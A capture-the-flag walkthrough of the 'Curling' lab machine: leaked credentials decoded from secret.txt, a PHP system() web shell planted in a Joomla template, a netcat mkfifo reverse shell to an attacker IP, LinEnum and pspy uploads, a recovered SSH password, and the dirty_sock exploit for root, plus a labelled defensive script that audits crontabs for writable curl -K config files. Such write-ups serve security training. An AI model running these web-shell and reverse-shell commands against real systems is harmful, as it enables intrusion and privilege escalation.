Again, we start with nmap -sC -sV -oA ./curling 10.10.10.150
Ok. Let's jump straight into the web service. We see from the nmap output that this site is running Joomla!
From the main page, we pick up two names: the "Written By" author, Super User, and the signature on the "My first post of Curling in 2018" post, floris. Checking the page source, we also see a comment mentioning secret.txt between the closing body and closing html tags (below the footer).
If we navigate to http://10.10.10.150/secret.txt, we are given the string "Q3VybGluZzIwMTgh". We can decode it on the command line or at https://www.base64decode.org/.
On the command line it would be 'echo Q3VybGluZzIwMTgh | base64 -d'. Either way, the output is 'Curling2018!'. While we were digging through the source code and decoding secret.txt, we already had Dirbuster doing its thing. Among the items it finds
is an administrator login page located at http://10.10.10.150/administrator/. Let's try floris:Curling2018! first, and we are now into the Joomla Control Panel. Now that we have access to the control panel, let's see what vulnerabilities are in Joomla 3.8.8. After searching a while, I look back at the Control Panel and check out the two templates. Protostar has the most promise. So, after selecting Templates in the Configuration list, selecting Templates in the Templates: Templates (Site) page, and selecting Protostar Details and Files, I am brought to a Customise page that asks me to select a file.
I choose index.php. Now let's add the line system($_REQUEST['rce']); to get RCE working (hopefully).
We save that and try to navigate to index.php?rce=[simple command]. I tried cat /etc/passwd and the same with URL encoding. Both failed. At this point, I'm not sure that my RCE is working, so let me try hostname and whoami.
OK. RCE is definitely working. So, 'cat /etc/passwd' must be too complex a command. Using the netcat reverse shell from Pentest Monkey's Reverse Shell Cheatsheet, I try to add
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.X.X 1234 >/tmp/f
to the template, but I take out the $_REQUEST piece. Set up a netcat listener to the port (1234 is what I used on mine). As soon as I save the template and refresh the home page, instant www-data shell. Time to look around. Navigate to the /tmp folder, set up a SimpleHTTPServer on your machine and use wget to copy LinEnum.sh to the target machine. Change the permissions and run it with -t.
On the attacking machine:
:/LinEnum$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
On the target machine:
chmod 777 LinEnum.sh
./LinEnum.sh -t > output.txt
I output mine to a txt file that I then move to my machine so that I can copy the results into the CTB file. That being said, if you look in the "Post-Exploitation > Script Results" section and find line 6140 of the LinEnum output, we find out that
/home/floris/password_backup is world readable. Oops. Somebody goofed on that one.
We can navigate to /home/floris, but the only thing we can open is password_backup. Which contains:
Nice HEXDUMP ya got there. Would be a shame if someone reversed it......
Create a file on the attacking machine and paste that into it. I used the name hexdump. Then use xxd -r to reverse it.
Looks like floris has a password of '5d<wdCbdZu)|hChXll'. What can we do with it? Well, we can ssh with it. That SSH just yielded us the User Flag. On to ROOT!
LinEnum output and manual searches on the box are not yielding a whole lot of information that I can use. Floris cannot sudo as anything, and Floris can't view cron jobs. That doesn't mean those cron jobs aren't there.
Let's see if pspy will run. We can download PSPY here and then use the usual SimpleHTTPServer/wget transfer to get it from attacker to victim.
After a minute or so, we see an interesting couple of items.
What does curl -K do? It tells curl to read its options from a config file, and here that config file is referenced by a cron job. See, there IS a cron job running. Let's take a look at the admin-area/input file.
floris@curling:~/admin-area$ ls -la
drwxr-x--- 2 root floris 4096 May 22 2018 .
drwxr-xr-x 6 floris floris 4096 Mar 31 14:44 ..
-rw-rw---- 1 root floris 25 Mar 31 14:54 input
-rw-rw---- 1 root floris 14248 Mar 31 14:54 report
The input file that the job is looking for is owned by the floris group, and it is group-writable. That means I can make changes to it. Also, the -o in the command pspy showed writes curl's output to the report file.
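From a defender's side, the weak point here is a root cron job reading a curl config file (curl -K) that a non-root group can write. The following is an added audit script, not code from the original post: it pulls the -K paths out of crontab text and flags any config file a non-root user could modify. The crontab line and the uid/gid/mode values used below are constructed for the example.

```python
import os
import re
import stat

# Matches "curl ... -K <file>" or "curl ... --config <file>" in a crontab command.
CURL_CONFIG_RE = re.compile(r"\bcurl\b.*?(?:-K|--config)\s+(\S+)")


def config_files_from_crontab(crontab_text):
    """Return the config-file paths handed to curl -K by each crontab line."""
    paths = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CURL_CONFIG_RE.search(line)
        if m:
            paths.append(m.group(1))
    return paths


def writable_by_non_root(uid, gid, mode):
    """True if a user other than root could modify a file with these attributes:
    owned by a non-root uid, group-writable with a non-root gid, or world-writable."""
    if uid != 0:
        return True
    if mode & stat.S_IWGRP and gid != 0:
        return True
    if mode & stat.S_IWOTH:
        return True
    return False


def audit(crontab_text):
    """Check every curl -K config file named in the crontab text on the local filesystem.
    Returns (path, reason) tuples for missing or non-root-writable config files."""
    findings = []
    for path in config_files_from_crontab(crontab_text):
        if not os.path.exists(path):
            findings.append((path, "missing"))
            continue
        st = os.stat(path)
        if writable_by_non_root(st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode)):
            findings.append((path, "writable by non-root"))
    return findings
```

A "missing" finding matters too: if root's cron job will read a path that does not exist yet, whoever can create it controls curl's options. Run audit() over the contents of /etc/crontab and /etc/cron.d/* on the host.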
Let's look back at the LinEnum output.
This is an Ubuntu box with a 18.104.22.168 kernel. I seem to remember a vuln called "dirty sock" that exploits the version of snapd on this box. Snagging the PoC code at https://github.com/initstring/dirty_sock, we transfer it over to the victim machine and run it. Once it completes, you can su to dirty_sock, and then sudo su to root and get the root shell.